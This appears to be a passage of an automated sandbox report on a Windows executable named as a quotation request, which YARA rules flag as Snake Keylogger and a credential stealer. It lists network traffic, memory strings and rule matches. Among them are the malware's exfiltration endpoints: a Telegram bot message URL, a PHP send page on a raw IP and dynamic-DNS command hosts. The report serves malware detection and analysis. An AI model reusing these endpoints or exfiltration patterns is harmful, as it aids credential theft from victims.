Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.tmcksa.com

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 08:08:38 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 08:08:41 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.dr	String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B53000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.tmcksa.com
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1601618602.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1652559674.0000000003247000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002961000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2797945092.0000000000434000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:067773%0D%0ADate%20a
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002AF7000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003197000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003188000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enH
Source: nDEusQ.exe, 0000000E.00000002.2800848818.0000000003192000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030BE000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029AF000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2797962195.0000000000435000.00000040.00000400.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: nDEusQ.exe, 0000000E.00000002.2800848818.000000000304F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A1F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.00000000029DA000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002A46000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030E6000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.0000000003079000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000030BE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, nDEusQ.exe.1.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003983000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2807258025.0000000003C6F000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.0000000004021000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2806233102.000000000430E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C9000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B28000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/8
Source: nDEusQ.exe, 0000000E.00000002.2800848818.00000000031BA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/H
Source: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe, 00000009.00000002.2801666248.0000000002B23000.00000004.00000800.00020000.00000000.sdmp, nDEusQ.exe, 0000000E.00000002.2800848818.00000000031C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:49750 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.nDEusQ.exe.429ad58.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 9.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.nDEusQ.exe.4256f38.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.nDEusQ.exe.429ad58.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 1.2.INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe.3b89e28.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 10.2.nDEusQ.exe.4256f38.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000001.00000002.1602761542.0000000003B46000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000000A.00000002.1656631080.0000000004256000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe PID: 7440, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: nDEusQ.exe PID: 7984, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe

Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 1_2_00FBDA5C	1_2_00FBDA5C
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1A088	9_2_00C1A088
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1C19B	9_2_00C1C19B
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1D278	9_2_00C1D278
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C15370	9_2_00C15370
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1C468	9_2_00C1C468
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1C738	9_2_00C1C738
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C129E0	9_2_00C129E0
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C1E988	9_2_00C1E988
Source: C:\Users\user\Desktop\INQS_RFQ441632-A_Shenle_Corporatin_Matrials_productions.exe	Code function: 9_2_00C169A0	9_2_00C169A0
